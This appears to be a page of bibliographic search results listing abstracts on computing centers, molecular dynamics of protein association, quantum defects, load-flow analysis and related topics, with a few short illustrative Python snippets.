    Computing protein-protein association affinities is one of the fundamental challenges in computational biophysics/biochemistry. The overwhelming amount of statistics in the phase space of very high dimensions cannot be sufficiently sampled even with today's high-performance computing power. In this article, we extend a potential of mean force (PMF)-based approach, the hybrid steered molecular dynamics (hSMD) approach we developed for ligand-protein binding, to protein-protein association problems. For a protein complex consisting of two protomers, P1 and P2, we choose m (≥3) segments of P1 whose m centers of mass are to be steered in a chosen direction and n (≥3) segments of P2 whose n centers of mass are to be steered in the opposite direction. The coordinates of these m + n centers constitute a phase space of 3(m + n) dimensions (3(m + n)D). All other degrees of freedom of the proteins, ligands, solvents, and solutes are freely subject to the stochastic dynamics of the all-atom model system. Conducting SMD along a line in this phase space, we obtain the 3(m + n)D PMF difference between two chosen states: one single state in the associated state ensemble and one single state in the dissociated state ensemble. This PMF difference is the first of four contributors to the protein-protein association energy. The second contributor is the 3(m + n - 1)D partial partition in the associated state accounting for the rotations and fluctuations of the (m + n - 1) centers while fixing one of the m + n centers of the P1-P2 complex. The two other contributors are the 3(m - 1)D partial partition of P1 and the 3(n - 1)D partial partition of P2 accounting for the rotations and fluctuations of their m - 1 or n - 1 centers while fixing one of the m/n centers of P1/P2 in the dissociated state. 
Each of these three partial partitions can be factored exactly into a 6D partial partition in multiplication with a remaining factor accounting for the small fluctuations while fixing three of the centers of P1, P2, or the P1-P2 complex, respectively. These small fluctuations can be well-approximated as Gaussian, and every 6D partition can be reduced in an exact manner to three problems of 1D sampling, counting the rotations and fluctuations around one of the centers as being fixed. We apply this hSMD approach to the Ras-RalGDS complex, choosing three centers on RalGDS and three on Ras (m = n = 3). At a computing cost of about 71.6 wall-clock hours using 400 computing cores in parallel, we obtained the association energy, -9.2 ± 1.9 kcal/mol on the basis of CHARMM 36 parameters, which agrees well with the experimental data, -8.4 ± 0.2 kcal/mol.
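As a small illustration of the coordinates being steered (not the hSMD implementation itself, and with the function name and array conventions assumed), the m + n segment centers of mass that define the 3(m + n)-dimensional phase space can be computed as:

```python
import numpy as np

def segment_centers(coords, masses, segments):
    """Centers of mass of chosen segments.
    coords: (N, 3) atomic positions; masses: (N,) atomic masses;
    segments: list of index lists, one per chosen segment.
    The m + n resulting centers are the collective coordinates steered
    along a line in the 3(m + n)-dimensional space of the abstract."""
    centers = []
    for idx in segments:
        m = masses[idx]
        centers.append((coords[idx] * m[:, None]).sum(axis=0) / m.sum())
    return np.array(centers)
```

In the actual method these centers are pulled in opposite directions for P1 and P2 while all other degrees of freedom evolve under stochastic dynamics.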

  19. Trip attraction rates of shopping centers in Northern New Castle County, Delaware.

    DOT National Transportation Integrated Search

    2004-07-01

This report presents the trip attraction rates of the shopping centers in Northern New Castle County in Delaware. The study aims to provide an alternative to the ITE Trip Generation Manual (1997) for computing the trip attraction of shopping centers ...

  20. NETL - Supercomputing: NETL Simulation Based Engineering User Center (SBEUC)

    ScienceCinema

    None

    2018-02-07

    NETL's Simulation-Based Engineering User Center, or SBEUC, integrates one of the world's largest high-performance computers with an advanced visualization center. The SBEUC offers a collaborative environment among researchers at NETL sites and those working through the NETL-Regional University Alliance.

  1. Computer Bits: Child Care Center Management Software Buying Guide Update.

    ERIC Educational Resources Information Center

    Neugebauer, Roger

    1987-01-01

    Compares seven center management programs used for basic financial and data management tasks such as accounting, payroll and attendance records, and mailing lists. Describes three other specialized programs and gives guidelines for selecting the best software for a particular center. (NH)

  2. NETL - Supercomputing: NETL Simulation Based Engineering User Center (SBEUC)

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    None

    2013-09-30

    NETL's Simulation-Based Engineering User Center, or SBEUC, integrates one of the world's largest high-performance computers with an advanced visualization center. The SBEUC offers a collaborative environment among researchers at NETL sites and those working through the NETL-Regional University Alliance.

  3. McMillan Magnet School: A Case History of a School Acquiring a Critical Mass of Computer Technology and Internet Connectivity.

    ERIC Educational Resources Information Center

    Grandgenett, Neal; And Others

    McMillan Magnet Center is located in urban Omaha, Nebraska, and specializes in math, computers, and communications. Once a junior high school, it was converted to a magnet center for seventh and eighth graders in the 1983-84 school year as part of Omaha's voluntary desegregation plan. Now the ethnic makeup of the student population is about 50%…

  4. Study of the Use of Time-Mean Vortices to Generate Lift for MAV Applications

    DTIC Science & Technology

    2011-05-31

A suspended microplate was fabricated via MEMS technology and driven to in-plane resonance via a Lorentz force. Computational effort centers around optimization of a range of parameters (geometry, frequency, amplitude of oscillation, etc.).

  5. ICAM (Integrated Computer Aided Manufacturing) Conceptual Design for Computer-Integrated Manufacturing. Volume 1. Project Overview and Technical Summary

    DTIC Science & Technology

    1984-06-29

sheet metal, machined, and composite parts and assembling the components into final products; planning, evaluating, testing, inspecting and ... Research showed that current programs were pursuing the design and demonstration of integrated centers for sheet metal, machining, and composites ... determine any metal parts required and to schedule these requirements from the machining center. Figure 3-33, Planned Composite Production, shows

  6. 3D Object Recognition: Symmetry and Virtual Views

    DTIC Science & Technology

    1992-12-01

Artificial Intelligence Laboratory and Center for Biological and Computational Learning, 545 Technology Square, Cambridge. A.I. Memo No. 1409; C.B.C.L. Paper No. 76, December 1992. ... research done within the Center for Biological and Computational Learning in the Department of Brain and Cognitive Sciences, and at the Artificial

  7. [Automated processing of data from the 1985 population and housing census].

    PubMed

    Cholakov, S

    1987-01-01

    The author describes the method of automated data processing used in the 1985 census of Bulgaria. He notes that the computerization of the census involves decentralization and the use of regional computing centers as well as data processing at the Central Statistical Office's National Information Computer Center. Special attention is given to problems concerning the projection and programming of census data. (SUMMARY IN ENG AND RUS)

  8. Ames Research Center Publications: A Continuing Bibliography

    NASA Technical Reports Server (NTRS)

    1981-01-01

    The Ames Research Center Publications: A Continuing Bibliography contains the research output of the Center indexed during 1981 in Scientific and Technical Aerospace Reports (STAR), Limited Scientific and Technical Aerospace Reports (LSTAR), International Aerospace Abstracts (IAA), and Computer Program Abstracts (CPA). This bibliography is published annually in an attempt to effect greater awareness and distribution of the Center's research output.

  9. Handling of Varied Data Bases in an Information Center Environment.

    ERIC Educational Resources Information Center

    Williams, Martha E.

    Information centers exist to provide information from machine-readable data bases to users in industry, universities and other organizations. The computer Search Center of the IIT Research Institute was designed with a number of variables and uncertainties before it. In this paper, the author discusses how the Center was designed to enable it to…

  10. 76 FR 59803 - Children's Online Privacy Protection Rule

    Federal Register 2010, 2011, 2012, 2013, 2014

    2011-09-27

    ...,'' covering the ``myriad of computer and telecommunications facilities, including equipment and operating..., Dir. and Professor of Computer Sci. and Pub. Affairs, Princeton Univ. (currently Chief Technologist at... data in the manner of a personal computer. See Electronic Privacy Information Center (``EPIC...

  11. System and method for transferring telemetry data between a ground station and a control center

    NASA Technical Reports Server (NTRS)

    Ray, Timothy J. (Inventor); Ly, Vuong T. (Inventor)

    2012-01-01

Disclosed herein are systems, computer-implemented methods, and tangible computer-readable media for coordinating communications between a ground station, a control center, and a spacecraft. The method receives a call to a simple, unified application programmer interface implementing communications protocols related to outer space. When the instruction relates to receiving a command at the control center for the ground station, the method generates an abstract message by agreeing upon a format for each type of abstract message with the ground station and using a set of message definitions to configure the command in the agreed-upon format, encodes the abstract message to generate an encoded message, and transfers the encoded message to the ground station. It performs similar actions when the instruction relates to receiving a second command as a second encoded message at the ground station from the control center, and when the determined instruction type relates to transmitting information to the control center.
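As a hedged sketch of the "agreed-upon format" idea (the message name, type ID, and format string below are hypothetical, not taken from the patent), a message definition shared by both sides allows symmetric encode/decode:

```python
import struct

# Hypothetical message definitions agreed between the control center and
# the ground station: each maps a message type to a wire format.
MESSAGE_DEFS = {
    "set_mode": ">HHf",   # big-endian: type id, command code, parameter
}
TYPE_IDS = {"set_mode": 1}

def encode(msg_type, command_code, parameter):
    """Encode an abstract message into the agreed wire format."""
    return struct.pack(MESSAGE_DEFS[msg_type], TYPE_IDS[msg_type],
                       command_code, parameter)

def decode(msg_type, payload):
    """Inverse of encode, used by the receiving side."""
    return struct.unpack(MESSAGE_DEFS[msg_type], payload)
```

Because both endpoints hold the same definitions, either side can decode exactly what the other encoded, which is the essence of agreeing on a format per message type.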

  12. Quantum computing with defects.

    PubMed

    Weber, J R; Koehl, W F; Varley, J B; Janotti, A; Buckley, B B; Van de Walle, C G; Awschalom, D D

    2010-05-11

Identifying and designing physical systems for use as qubits, the basic units of quantum information, are critical steps in the development of a quantum computer. Among the possibilities in the solid state, a defect in diamond known as the negatively charged nitrogen-vacancy (NV⁻) center stands out for its robustness: its quantum state can be initialized, manipulated, and measured with high fidelity at room temperature. Here we describe how to systematically identify other deep center defects with similar quantum-mechanical properties. We present a list of physical criteria that these centers and their hosts should meet and explain how these requirements can be used in conjunction with electronic structure theory to intelligently sort through candidate defect systems. To illustrate these points in detail, we compare electronic structure calculations of the NV⁻ center in diamond with those of several deep centers in 4H silicon carbide (SiC). We then discuss the proposed criteria for similar defects in other tetrahedrally coordinated semiconductors.

  13. High Performance Computing Meets Energy Efficiency - Continuum Magazine |

    Science.gov Websites

The new High Performance Computing Data Center at the National Renewable Energy Laboratory (NREL) hosts high-speed, high-volume data. Wind turbine simulation by Patrick J. Moriarty and Matthew J. Churchfield, NREL.

  14. Examining the Feasibility and Effect of Transitioning GED Tests to Computer

    ERIC Educational Resources Information Center

    Higgins, Jennifer; Patterson, Margaret Becker; Bozman, Martha; Katz, Michael

    2010-01-01

    This study examined the feasibility of administering GED Tests using a computer based testing system with embedded accessibility tools and the impact on test scores and test-taker experience when GED Tests are transitioned from paper to computer. Nineteen test centers across five states successfully installed the computer based testing program,…

  15. 75 FR 8311 - Privacy Act of 1974; Notice of a Computer Matching Program

    Federal Register 2010, 2011, 2012, 2013, 2014

    2010-02-24

    ...; Notice of a Computer Matching Program AGENCY: Defense Manpower Data Center, DoD. ACTION: Notice of a... hereby giving notice to the record subjects of a computer matching program between the Department of... conduct a computer matching program between the agencies. The purpose of this agreement is to verify an...

  16. Employment Trends in Computer Occupations. Bulletin 2101.

    ERIC Educational Resources Information Center

    Howard, H. Philip; Rothstein, Debra E.

    In 1980 1,455,000 persons worked in computer occupations. Two in five were systems analysts or programmers; one in five was a keypunch operator; one in 20 was a computer service technician; and more than one in three were computer and peripheral equipment operators. Employment was concentrated in major urban centers in four major industry…

  17. Webinar: Delivering Transformational HPC Solutions to Industry

    ScienceCinema

    Streitz, Frederick

    2018-01-16

    Dr. Frederick Streitz, director of the High Performance Computing Innovation Center, discusses Lawrence Livermore National Laboratory computational capabilities and expertise available to industry in this webinar.

  18. Ames Research Center publications: A continuing bibliography, 1980

    NASA Technical Reports Server (NTRS)

    1981-01-01

    This bibliography lists formal NASA publications, journal articles, books, chapters of books, patents, contractor reports, and computer programs that were issued by Ames Research Center and indexed by Scientific and Technical Aerospace Reports, Limited Scientific and Technical Aerospace Reports, International Aerospace Abstracts, and Computer Program Abstracts in 1980. Citations are arranged by directorate, type of publication, and NASA accession numbers. Subject, personal author, corporate source, contract number, and report/accession number indexes are provided.

  19. A Winning Cast

    NASA Technical Reports Server (NTRS)

    2001-01-01

    Howmet Research Corporation was the first to commercialize an innovative cast metal technology developed at Auburn University, Auburn, Alabama. With funding assistance from NASA's Marshall Space Flight Center, Auburn University's Solidification Design Center (a NASA Commercial Space Center) developed accurate nickel-based superalloy data for casting molten metals. Through a contract agreement, Howmet used the data to develop computer model predictions of molten metals and molding materials in cast metal manufacturing. Howmet Metal Mold (HMM), part of Howmet Corporation Specialty Products, of Whitehall, Michigan, utilizes metal molds to manufacture net shape castings in various alloys and amorphous metal (metallic glass). By implementing the thermophysical property data developed by Auburn researchers, Howmet employs its newly developed computer model predictions to offer customers high-quality, low-cost products with significantly improved mechanical properties. Components fabricated with this new process replace components originally made from forgings or billet. Compared with products manufactured through traditional casting methods, Howmet's computer-modeled castings come out on top.

  20. Touch-screen computerized education for patients with brain injuries.

    PubMed

    Patyk, M; Gaynor, S; Kelly, J; Ott, V

    1998-01-01

    The use of computer technology for patient education has increased in recent years. This article describes a study that measures the attitudes and perceptions of healthcare professionals and laypeople regarding the effectiveness of a multimedia computer, the Brain Injury Resource Center (BIRC), as an educational tool. The study focused on three major themes: (a) usefulness of the information presented, (b) effectiveness of the multimedia touch-screen computer methodology, and (c) the appropriate time for making this resource available. This prospective study, conducted in an acute care medical center, obtained healthcare professionals' evaluations using a written survey and responses from patients with brain injury and their families during interviews. The findings have yielded excellent ratings as to the ease of understanding and usefulness of the BIRC. By using sight, sound, and touch, such a multimedia learning center has the potential to simplify patient and family education.

  1. Institute for Computational Mechanics in Propulsion (ICOMP)

    NASA Technical Reports Server (NTRS)

    Feiler, Charles E. (Compiler)

    1993-01-01

    The Institute for Computational Mechanics in Propulsion (ICOMP) was established at the NASA Lewis Research Center in Cleveland, Ohio to develop techniques to improve problem-solving capabilities in all aspects of computational mechanics related to propulsion. The activities at ICOMP during 1992 are described.

  2. Best Practice Guidelines for Computer Technology in the Montessori Early Childhood Classroom.

    ERIC Educational Resources Information Center

    Montminy, Peter

    1999-01-01

    Presents a draft for a principle-centered position statement of a Montessori early childhood program in central Pennsylvania, on the pros and cons of computer use in a Montessori 3-6 classroom. Includes computer software rating form. (Author/KB)

  3. Computer Center: It's Time to Take Inventory.

    ERIC Educational Resources Information Center

    Spain, James D.

    1984-01-01

    Describes typical instructional applications of computers. Areas considered include: (1) instructional simulations and animations; (2) data analysis; (3) drill and practice; (4) student evaluation; (5) development of computer models and simulations; (6) biometrics or biostatistics; and (7) direct data acquisition and analysis. (JN)

  4. Center for Computational Structures Technology

    NASA Technical Reports Server (NTRS)

    Noor, Ahmed K.; Perry, Ferman W.

    1995-01-01

    The Center for Computational Structures Technology (CST) is intended to serve as a focal point for the diverse CST research activities. The CST activities include the use of numerical simulation and artificial intelligence methods in modeling, analysis, sensitivity studies, and optimization of flight-vehicle structures. The Center is located at NASA Langley and is an integral part of the School of Engineering and Applied Science of the University of Virginia. The key elements of the Center are: (1) conducting innovative research on advanced topics of CST; (2) acting as pathfinder by demonstrating to the research community what can be done (high-potential, high-risk research); (3) strong collaboration with NASA scientists and researchers from universities and other government laboratories; and (4) rapid dissemination of CST to industry, through integration of industrial personnel into the ongoing research efforts.

  5. NASA Space Engineering Research Center for VLSI systems design

    NASA Technical Reports Server (NTRS)

    1991-01-01

    This annual review reports the center's activities and findings on very large scale integration (VLSI) systems design for 1990, including project status, financial support, publications, the NASA Space Engineering Research Center (SERC) Symposium on VLSI Design, research results, and outreach programs. Processor chips completed or under development are listed. Research results summarized include a design technique to harden complementary metal oxide semiconductors (CMOS) memory circuits against single event upset (SEU); improved circuit design procedures; and advances in computer aided design (CAD), communications, computer architectures, and reliability design. Also described is a high school teacher program that exposes teachers to the fundamentals of digital logic design.

  6. A Comprehensive Computer Package for Ambulatory Surgical Facilities

    PubMed Central

    Kessler, Robert R.

    1980-01-01

    Ambulatory surgical centers are a cost effective alternative to hospital surgery. Their increasing popularity has contributed to heavy case loads, an accumulation of vast amounts of medical and financial data and economic pressures to maintain a tight control over “cash flow”. Computerization is now a necessity to aid ambulatory surgical centers to maintain their competitive edge. An on-line system is especially necessary as it allows interactive scheduling of surgical cases, immediate access to financial data and rapid gathering of medical and statistical information. This paper describes the significant features of the computer package in use at the Salt Lake Surgical Center, which processes 500 cases per month.

  7. Integration of the Chinese HPC Grid in ATLAS Distributed Computing

    NASA Astrophysics Data System (ADS)

    Filipčič, A.; ATLAS Collaboration

    2017-10-01

    Fifteen Chinese High-Performance Computing sites, many of them on the TOP500 list of most powerful supercomputers, are integrated into a common infrastructure providing coherent user access through a RESTful interface called SCEAPI. These resources have been integrated into the ATLAS Grid production system using a bridge between ATLAS and SCEAPI which translates the authorization and job submission protocols between the two environments. The ARC Computing Element (ARC-CE) forms the bridge using an extended batch system interface to allow job submission to SCEAPI. The ARC-CE was set up at the Institute for High Energy Physics, Beijing, in order to be as close as possible to the SCEAPI front-end interface at the Computing Network Information Center, also in Beijing. This paper describes the technical details of the integration between ARC-CE and SCEAPI and presents results so far with two supercomputer centers, Tianhe-IA and ERA. These two centers have been the pilots for ATLAS Monte Carlo Simulation in SCEAPI and have been providing CPU power since fall 2015.

  8. New frontiers in design synthesis

    NASA Technical Reports Server (NTRS)

    Goldin, D. S.; Venneri, S. L.; Noor, A. K.

    1999-01-01

    The Intelligent Synthesis Environment (ISE), which is one of the major strategic technologies under development at NASA centers and the University of Virginia, is described. One of the major objectives of ISE is to significantly enhance the rapid creation of innovative affordable products and missions. ISE uses a synergistic combination of leading-edge technologies, including high performance computing, high capacity communications and networking, human-centered computing, knowledge-based engineering, computational intelligence, virtual product development, and product information management. The environment will link scientists, design teams, manufacturers, suppliers, and consultants who participate in the mission synthesis as well as in the creation and operation of the aerospace system. It will radically advance the process by which complex science missions are synthesized, and high-tech engineering systems are designed, manufactured, and operated. The five major components critical to ISE are human-centered computing, infrastructure for distributed collaboration, rapid synthesis and simulation tools, life cycle integration and validation, and cultural change in both the engineering and science creative process. The five components and their subelements are described. Related U.S. government programs are outlined and the future impact of ISE on engineering research and education is discussed.

  9. Networking at NASA. Johnson Space Center

    NASA Technical Reports Server (NTRS)

    Garman, John R.

    1991-01-01

    A series of viewgraphs on computer networks at the Johnson Space Center (JSC) are given. Topics covered include information resource management (IRM) at JSC, the IRM budget by NASA center, networks evolution, networking as a strategic tool, the Information Services Directorate charter, and SSC network requirements, challenges, and status.

  10. Steve Hammond | NREL

    Science.gov Websites

    Steve Hammond, Center Director II-Technical, Steven.Hammond@nrel.gov | 303-275-4121. Steve Hammond is director of the Computational Science Center at the National Renewable Energy Laboratory; his role includes leading NREL's efforts in energy-efficient data centers. Prior to NREL, Steve managed the…

  11. Guidelines for development of NASA (National Aeronautics and Space Administration) computer security training programs

    NASA Technical Reports Server (NTRS)

    Tompkins, F. G.

    1983-01-01

    The report presents guidance for the NASA Computer Security Program Manager and the NASA Center Computer Security Officials as they develop training requirements and implement computer security training programs. NASA audiences are categorized based on the computer security knowledge required to accomplish identified job functions. Training requirements, in terms of training subject areas, are presented for both computer security program management personnel and computer resource providers and users. Sources of computer security training are identified.

  12. Center for Aeronautics and Space Information Sciences

    NASA Technical Reports Server (NTRS)

    Flynn, Michael J.

    1992-01-01

    This report summarizes the research done during 1991/92 under the Center for Aeronautics and Space Information Science (CASIS) program. The topics covered are computer architecture, networking, and neural nets.

  13. Accelerating MP2C dispersion corrections for dimers and molecular crystals

    NASA Astrophysics Data System (ADS)

    Huang, Yuanhang; Shao, Yihan; Beran, Gregory J. O.

    2013-06-01

    The MP2C dispersion correction of Pitonak and Hesselmann [J. Chem. Theory Comput. 6, 168 (2010)], 10.1021/ct9005882 substantially improves the performance of second-order Møller-Plesset perturbation theory for non-covalent interactions, albeit with non-trivial computational cost. Here, the MP2C correction is computed in a monomer-centered basis instead of a dimer-centered one. When applied to a single dimer MP2 calculation, this change accelerates the MP2C dispersion correction several-fold while introducing only trivial new errors. More significantly, in the context of fragment-based molecular crystal studies, combination of the new monomer basis algorithm and the periodic symmetry of the crystal reduces the cost of computing the dispersion correction by two orders of magnitude. This speed-up reduces the MP2C dispersion correction calculation from a significant computational expense to a negligible one in crystals like aspirin or oxalyl dihydrazide, without compromising accuracy.

  14. Jackson State University's Center for Spatial Data Research and Applications: New facilities and new paradigms

    NASA Technical Reports Server (NTRS)

    Davis, Bruce E.; Elliot, Gregory

    1989-01-01

    Jackson State University recently established the Center for Spatial Data Research and Applications, a Geographical Information System (GIS) and remote sensing laboratory. Taking advantage of new technologies and new directions in the spatial (geographic) sciences, JSU is building a Center of Excellence in Spatial Data Management. New opportunities for research, applications, and employment are emerging. GIS requires fundamental shifts and new demands in traditional computer science and geographic training. The Center is not merely another computer lab but is one setting the pace in a new applied frontier. GIS and its associated technologies are discussed. The Center's facilities are described. An ARC/INFO GIS runs on a Vax mainframe, with numerous workstations. Image processing packages include ELAS, LIPS, VICAR, and ERDAS. A host of hardware and software peripherals are used in support. Numerous projects are underway, such as the construction of a Gulf of Mexico environmental data base, development of AI in image processing, a land use dynamics study of metropolitan Jackson, and others. A new academic interdisciplinary program in Spatial Data Management is under development, combining courses in Geography and Computer Science. The broad range of JSU's GIS and remote sensing activities is addressed. The impacts on changing paradigms in the university and in the professional world conclude the discussion.

  15. Voltage profile program for the Kennedy Space Center electric power distribution system

    NASA Technical Reports Server (NTRS)

    1976-01-01

    The Kennedy Space Center voltage profile program computes voltages at all busses greater than 1 Kv in the network under various conditions of load. The computation is based upon power flow principles and utilizes a Newton-Raphson iterative load flow algorithm. Power flow conditions throughout the network are also provided. The computer program is designed for both steady state and transient operation. In the steady state mode, automatic tap changing of primary distribution transformers is incorporated. Under transient conditions, such as motor starts etc., it is assumed that tap changing is not accomplished so that transformer secondary voltage is allowed to sag.
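
    The Newton-Raphson load-flow iteration described above is standard in power-system analysis. As a rough illustration only (not the KSC program itself), the following minimal two-bus Python sketch solves for the load-bus voltage and angle; the line impedance and load values are assumed, and the Jacobian is approximated numerically rather than derived analytically:

```python
import numpy as np

# Minimal 2-bus Newton-Raphson load flow sketch (illustrative only).
# Bus 1: slack bus, V = 1.0 p.u. at angle 0. Bus 2: PQ load bus.
z_line = 0.01 + 0.10j            # line impedance, p.u. (assumed)
y = 1.0 / z_line
Ybus = np.array([[y, -y], [-y, y]])
P2_spec, Q2_spec = -0.5, -0.2    # net injected power at bus 2 (a load), p.u.

def mismatch(x):
    """Power mismatch at bus 2 for unknowns x = [theta2, V2]."""
    theta2, v2 = x
    V = np.array([1.0 + 0j, v2 * np.exp(1j * theta2)])
    S2 = V[1] * np.conj(Ybus[1] @ V)       # complex power injection at bus 2
    return np.array([S2.real - P2_spec, S2.imag - Q2_spec])

x = np.array([0.0, 1.0])                   # "flat start" initial guess
for _ in range(20):
    f = mismatch(x)
    if np.max(np.abs(f)) < 1e-10:
        break
    # Finite-difference Jacobian (a production solver uses analytic terms)
    J = np.empty((2, 2))
    for j in range(2):
        dx = np.zeros(2)
        dx[j] = 1e-7
        J[:, j] = (mismatch(x + dx) - f) / 1e-7
    x = x - np.linalg.solve(J, f)          # Newton-Raphson update

theta2, v2 = x
print(f"V2 = {v2:.4f} p.u., angle = {np.degrees(theta2):.3f} deg")
```

    Under load the bus-2 voltage sags below 1.0 p.u. and its angle lags the slack bus, which mirrors the transient voltage-sag behavior the abstract describes.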

  16. Developmental Stages in School Computer Use: Neither Marx Nor Piaget.

    ERIC Educational Resources Information Center

    Lengel, James G.

    Karl Marx's theory of stages can be applied to computer use in the schools. The first stage, the P Stage, comprises the entry of the computer into the school. Computer use at this stage is personal and tends to center around one personality. Social studies teachers are seldom among this select few. The second stage of computer use, the D Stage, is…

  17. Nontrivial, Nonintelligent, Computer-Based Learning.

    ERIC Educational Resources Information Center

    Bork, Alfred

    1987-01-01

    This paper describes three interactive computer programs used with personal computers to present science learning modules for all ages. Developed by groups of teachers at the Educational Technology Center at the University of California, Irvine, these instructional materials do not use the techniques of contemporary artificial intelligence. (GDC)

  18. Advanced laptop and small personal computer technology

    NASA Technical Reports Server (NTRS)

    Johnson, Roger L.

    1991-01-01

    Advanced laptop and small personal computer technology is presented in the form of viewgraphs. The following areas of hand-carried computer and mobile workstation technology are covered: background, applications, high-end products, technology trends, requirements for the Control Center application, and recommendations for the future.

  19. Argonne's Magellan Cloud Computing Research Project

    ScienceCinema

    Beckman, Pete

    2017-12-11

    Pete Beckman, head of Argonne's Leadership Computing Facility (ALCF), discusses the Department of Energy's new $32-million Magellan project, which is designed to test how cloud computing can be used for scientific research. More information: http://www.anl.gov/Media_Center/News/2009/news091014a.html

  20. Argonne's Magellan Cloud Computing Research Project

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Beckman, Pete

    Pete Beckman, head of Argonne's Leadership Computing Facility (ALCF), discusses the Department of Energy's new $32-million Magellan project, which is designed to test how cloud computing can be used for scientific research. More information: http://www.anl.gov/Media_Center/News/2009/news091014a.html

  1. Computer Operating System Maintenance.

    DTIC Science & Technology

    1982-06-01

    FACILITY The Computer Management Information Facility ( CMIF ) system was developed by Rapp Systems to fulfill the need at the CRF to record and report on...computer center resource usage and utilization. The foundation of the CMIF system is a System 2000 data base (CRFMGMT) which stores and permits access

  2. Computational Nanotechnology Molecular Electronics, Materials and Machines

    NASA Technical Reports Server (NTRS)

    Srivastava, Deepak; Biegel, Bryan A. (Technical Monitor)

    2002-01-01

    This presentation covers research being performed on computational nanotechnology, carbon nanotubes and fullerenes at the NASA Ames Research Center. Topics cover include: nanomechanics of nanomaterials, nanotubes and composite materials, molecular electronics with nanotube junctions, kinky chemistry, and nanotechnology for solid-state quantum computers using fullerenes.

  3. Performance assessment of KORAT-3D on the ANL IBM-SP computer

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Alexeyev, A.V.; Zvenigorodskaya, O.A.; Shagaliev, R.M.

    1999-09-01

    The TENAR code is currently being developed at the Russian Federal Nuclear Center (VNIIEF) as a coupled dynamics code for the simulation of transients in VVER and RBMK systems and other nuclear systems. The neutronic module in this code system is KORAT-3D. This module is also one of the most computationally intensive components of the code system. A parallel version of KORAT-3D has been implemented to achieve the goal of obtaining transient solutions in reasonable computational time, particularly for RBMK calculations that involve the application of >100,000 nodes. An evaluation of the KORAT-3D code performance was recently undertaken on the Argonne National Laboratory (ANL) IBM ScalablePower (SP) parallel computer located in the Mathematics and Computer Science Division of ANL. At the time of the study, the ANL IBM-SP computer had 80 processors. This study was conducted under the auspices of a technical staff exchange program sponsored by the International Nuclear Safety Center (INSC).

  4. User-Centered Design of Online Learning Communities

    ERIC Educational Resources Information Center

    Lambropoulos, Niki, Ed.; Zaphiris, Panayiotis, Ed.

    2007-01-01

    User-centered design (UCD) is gaining popularity in both the educational and business sectors. This is due to the fact that UCD sheds light on the entire process of analyzing, planning, designing, developing, using, evaluating, and maintaining computer-based learning. "User-Centered Design of Online Learning Communities" explains how…

  5. Planning for the Automation of School Library Media Centers.

    ERIC Educational Resources Information Center

    Caffarella, Edward P.

    1996-01-01

    Geared for school library media specialists whose centers are in the early stages of automation or conversion to a new system, this article focuses on major components of media center automation: circulation control; online public access catalogs; machine readable cataloging; retrospective conversion of print catalog cards; and computer networks…

  6. 28 CFR 523.13 - Community corrections center good time.

    Code of Federal Regulations, 2011 CFR

    2011-07-01

    ... ADMISSION, CLASSIFICATION, AND TRANSFER COMPUTATION OF SENTENCE Extra Good Time § 523.13 Community corrections center good time. Extra good time for an inmate in a Federal or contract Community Corrections... 28 Judicial Administration 2 2011-07-01 2011-07-01 false Community corrections center good time...

  7. 28 CFR 523.13 - Community corrections center good time.

    Code of Federal Regulations, 2010 CFR

    2010-07-01

    ... ADMISSION, CLASSIFICATION, AND TRANSFER COMPUTATION OF SENTENCE Extra Good Time § 523.13 Community corrections center good time. Extra good time for an inmate in a Federal or contract Community Corrections... 28 Judicial Administration 2 2010-07-01 2010-07-01 false Community corrections center good time...

  8. 28 CFR 523.13 - Community corrections center good time.

    Code of Federal Regulations, 2014 CFR

    2014-07-01

    ... ADMISSION, CLASSIFICATION, AND TRANSFER COMPUTATION OF SENTENCE Extra Good Time § 523.13 Community corrections center good time. Extra good time for an inmate in a Federal or contract Community Corrections... 28 Judicial Administration 2 2014-07-01 2014-07-01 false Community corrections center good time...

  9. 28 CFR 523.13 - Community corrections center good time.

    Code of Federal Regulations, 2012 CFR

    2012-07-01

    ... ADMISSION, CLASSIFICATION, AND TRANSFER COMPUTATION OF SENTENCE Extra Good Time § 523.13 Community corrections center good time. Extra good time for an inmate in a Federal or contract Community Corrections... 28 Judicial Administration 2 2012-07-01 2012-07-01 false Community corrections center good time...

  10. 28 CFR 523.13 - Community corrections center good time.

    Code of Federal Regulations, 2013 CFR

    2013-07-01

    ... ADMISSION, CLASSIFICATION, AND TRANSFER COMPUTATION OF SENTENCE Extra Good Time § 523.13 Community corrections center good time. Extra good time for an inmate in a Federal or contract Community Corrections... 28 Judicial Administration 2 2013-07-01 2013-07-01 false Community corrections center good time...

  11. A Computer-Based System Integrating Instruction and Information Retrieval: A Description of Some Methodological Considerations.

    ERIC Educational Resources Information Center

    Selig, Judith A.; And Others

    This report, summarizing the activities of the Vision Information Center (VIC) in the field of computer-assisted instruction from December, 1966 to August, 1967, describes the methodology used to load a large body of information--a programed text on basic opthalmology--onto a computer for subsequent information retrieval and computer-assisted…

  12. 76 FR 14669 - Privacy Act of 1974; CMS Computer Match No. 2011-02; HHS Computer Match No. 1007

    Federal Register 2010, 2011, 2012, 2013, 2014

    2011-03-17

    ... (CMS); and Department of Defense (DoD), Manpower Data Center (DMDC), Defense Enrollment and Eligibility... the results of the computer match and provide the information to TMA for use in its matching program... under TRICARE. DEERS will receive the results of the computer match and provide the information provided...

  13. 76 FR 50460 - Privacy Act of 1974; Notice of a Computer Matching Program

    Federal Register 2010, 2011, 2012, 2013, 2014

    2011-08-15

    ...; Notice of a Computer Matching Program AGENCY: Defense Manpower Data Center, Department of Defense (DoD). ACTION: Notice of a Computer Matching Program. SUMMARY: Subsection (e)(12) of the Privacy Act of 1974, as amended, (5 U.S.C. 552a) requires agencies to publish advance notice of any proposed or revised computer...

  14. 76 FR 77811 - Privacy Act of 1974; Notice of a Computer Matching Program

    Federal Register 2010, 2011, 2012, 2013, 2014

    2011-12-14

    ...; Notice of a Computer Matching Program AGENCY: Defense Manpower Data Center, Department of Defense (DoD). ACTION: Notice of a Computer Matching Program. SUMMARY: Subsection (e)(12) of the Privacy Act of 1974, as amended, (5 U.S.C. 552a) requires agencies to publish advance notice of any proposed or revised computer...

  15. ARC-2009-ACD09-0208-004

    NASA Image and Video Library

    2009-09-15

    Obama Administration launches Cloud Computing Initiative at Ames Research Center with left to right; S. Pete Worden, Center Director, Lori Garver, NASA Deputy Administrator, Vivek Kundra, White House Chief Federal Information Officer

  16. 77 FR 11139 - Center for Scientific Review; Notice of Closed Meetings

    Federal Register 2010, 2011, 2012, 2013, 2014

